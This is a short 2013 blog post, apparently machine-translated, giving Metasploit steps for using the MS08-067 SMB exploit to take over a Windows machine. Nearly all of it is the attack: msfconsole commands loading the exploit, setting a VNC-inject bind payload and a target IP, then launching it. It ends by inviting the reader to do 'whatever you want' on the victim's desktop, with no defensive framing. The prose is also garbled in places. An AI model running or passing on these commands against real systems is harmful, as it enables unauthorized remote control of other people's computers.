Wednesday, January 23, 2013

How To Remote Desktop use Exploit in backtrack 5


How To Remote Desktop use Exploit in backtrack 5
RDP or better known as Remote Desktop commonly used in windows OS, so that the computer can be accessed remotely melaluui Internet network
.
But this time I will OFTEN how to RDP without touching the computer that will be remote. In this case use the exploit on BackTrack 5,, okay without a lot of talking directly to the scene

1. Turn your BackTrack 5
2. Open Terminal
3. directly into the Metasploit with the syntax:
     root@bt:~# msfconsole
4. wait until the Metasploit open
5. open directly after just typing
   msf > use exploit/windows/smb/ms08_067_netapi ( enter )

6. then it will go to the dir
   msf> exploit (ms08_067_netapi )

7. and typing
    msf> exploit (ms08_067_netapi ) set PAYLOAD windows/vncinject/bind_tcp ( enter )
    msf> exploit (ms08_067_netapi ) set RHOST 192.168.0.1 ==> itu IP target
    msf> exploit (ms08_067_netapi ) exploit 

8. How successful it will exit the victim's computer desktop, if you've never so whatever you want in how that company..


Recent Posts